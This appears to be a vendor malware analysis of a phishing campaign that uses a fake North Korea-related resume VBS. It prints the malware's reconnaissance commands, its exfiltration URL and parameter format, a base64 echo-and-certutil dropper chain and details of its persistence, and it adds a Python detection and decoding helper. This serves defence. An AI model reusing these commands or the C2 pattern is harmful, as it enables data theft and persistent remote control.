The ASEC analysis team has recently discovered that a malicious info-leaking VBS is being distributed via phishing email disguised as North Korea-related material. The email is about casting calls for a North Korea-related broadcast, and a compressed file is attached to it. It asks the readers to fill out the resume, prompting them to run the file. The compressed file contains a malicious VBS script file.
The activities of ‘2022 Resume Template.vbs’ are as follows:
- Collects and sends information
- Creates a normal HWP file
- Creates additional malicious script files and registers them in Task Scheduler
When the VBS file is run, it collects user PC information using the commands below.
| Collected information | Command |
|---|---|
| List of currently running processes | `cmd /c tasklist /v \| clip` |
| Routing table information | `cmd /c Route print \| clip` |
| Program Files folder information | `cmd /c dir /w ""%SystemRoot%/../Program Files"" \| clip` |
| Program Files (x86) folder information | `cmd /c dir /w ""%SystemRoot%/../Program Files (x86)"" \| clip` |
It then encodes the collected information with Base64 and sends it to hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php.
- Parameter value: Cache=error&Sand=[Username]&Data=[Collected information encoded with base64]&Em=[Username encoded with base64]
It then runs ‘2022.hwp’, an HWP file it created in the folder from which ‘2022 Resume Template.vbs’ was executed, so that the script appears to be a normal document. The HWP file contains a resume template as shown below.
It then uses PowerShell to execute the data contained in the response received from the URL to which the information was sent. It also registers the %appdata%\mscornet.vbs file created from that response in Task Scheduler under the name Google Update Source Link. Furthermore, it copies mscornet.vbs to the Startup folder so that the VBS file runs automatically, then deletes ‘2022 Resume Template.vbs.’
Although no meaningful response can currently be received from hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php (the destination of the sent information), additional commands exist in the response recorded by AhnLab’s automatic analysis system RAPIT (confirmed on March 26th).
In the response message, PowerShell is used to save base64-encoded data to %AppData%\~KB3241.tmp. The script then decodes ~KB3241.tmp with certutil, saves the result as %AppData%\mscornet.vbs, and deletes ~KB3241.tmp.
```
powershell -w hidden ECHO OFF
echo RnVuY3Rpb24gaDJzKGgpDQogIERpbSBhIDogYSA9IFNwbGl0KGgpDQogIERpbSBp > "%AppData%\~KB3241.tmp"
echo DQogIEZvciBpID0gMCBUbyBVQm91bmQoYSkNCiAgICAgIGEoaSkgPSBDaHIoIiYi >> "%AppData%\~KB3241.tmp"
<omitted>
echo ZSINCmtpbGxQcm9jZXNzICJpZWxvd3V0aWwuZXhlIg== >> "%AppData%\~KB3241.tmp"
certutil -f -decode "%AppData%\~KB3241.tmp" "%AppData%\mscornet.vbs"
del "%AppData%\~KB3241.tmp"
```
mscornet.vbs accesses hxxp://cmaildowninvoice.webcindario[.]com/contri/sqlite/msgbugGlog.php?Cache=fail&Sand=[PC name] and runs the received response with the Execute statement. No additional commands are currently served from this URL, but the attacker can use it to make the script perform arbitrary malicious actions.
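As an added example (not part of ASEC’s report or the malware’s code), the following Python helper checks process-creation events against the indicators described above (reconnaissance piped to `clip`, the `~KB3241.tmp` dropper, the certutil decode into mscornet.vbs, the task name, the msgbug*log.php URLs) and decodes an exfiltration body of the form `Cache=error&Sand=…&Data=…&Em=…`. The event field names are an assumption (a minimal Sysmon-style record) and all sample records are constructed.

```python
import base64
import re
from urllib.parse import parse_qs

# Indicators lifted from the analysis above; event field names (ParentImage, CommandLine) are assumed.
RECON_TO_CLIP = re.compile(r"cmd\s+/c\s+(tasklist\s+/v|route\s+print|dir\s+/w\b).*\|\s*clip", re.I)
TMP_DROPPER = re.compile(r'echo\s+[A-Za-z0-9+/=]{16,}\s*>>?\s*"?%AppData%\\~KB3241\.tmp', re.I)
CERTUTIL_DECODE = re.compile(r"certutil\s+-f\s+-decode\s+.*~KB3241\.tmp.*mscornet\.vbs", re.I)
C2_URL = re.compile(r"webcindario\.com/contri/sqlite/msgbug[PG]log\.php\?Cache=(error|fail)&Sand=", re.I)
TASK_NAME = "google update source link"


def classify_event(event):
    """Return the names of the report's indicators that one process-creation event matches."""
    cmd = event.get("CommandLine", "")
    hits = []
    if event.get("ParentImage", "").lower().endswith("wscript.exe") and RECON_TO_CLIP.search(cmd):
        hits.append("recon_piped_to_clip")            # tasklist / route print / dir ... | clip
    if TMP_DROPPER.search(cmd):
        hits.append("base64_dropper_tmp")             # echo <base64> >> %AppData%\~KB3241.tmp
    if CERTUTIL_DECODE.search(cmd):
        hits.append("certutil_decode_mscornet")       # ~KB3241.tmp decoded into mscornet.vbs
    if TASK_NAME in cmd.lower():
        hits.append("task_google_update_source_link")
    if C2_URL.search(cmd):
        hits.append("c2_msgbug_url")
    return hits


def decode_exfil_body(body):
    """Decode the 'Cache=error&Sand=..&Data=<b64>&Em=<b64>' body as it would appear in a proxy log."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    for field in ("Data", "Em"):
        if field in params:
            # Base64 sent without URL-encoding: form decoding turns '+' into ' ', so undo that.
            raw = params[field].replace(" ", "+")
            params[field] = base64.b64decode(raw).decode("utf-8", "replace")
    return params


# Constructed sample records, not telemetry from the report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "CommandLine": "cmd /c tasklist /v | clip"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'certutil -f -decode "%AppData%\~KB3241.tmp" "%AppData%\mscornet.vbs"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd /c dir /w C:\\Users"},  # benign
]
SAMPLE_RECON = "Image Name   PID\r\nwscript.exe  4120\r\n"  # constructed tasklist-style output
SAMPLE_BODY = ("Cache=error&Sand=user01&Data=" + base64.b64encode(SAMPLE_RECON.encode()).decode()
               + "&Em=dXNlcjAx")  # dXNlcjAx is base64("user01")
```

Feeding `SAMPLE_EVENTS` through `classify_event` flags the first two records and leaves the benign `dir` untouched; `decode_exfil_body(SAMPLE_BODY)` recovers the username and the plaintext reconnaissance output from the Data and Em fields.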
Users must remain vigilant, as malware disguised as North Korea-related material has recently been distributed both as Word files and as VBS scripts.
AhnLab’s anti-malware software, V3, is currently detecting and blocking the files using the following aliases.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.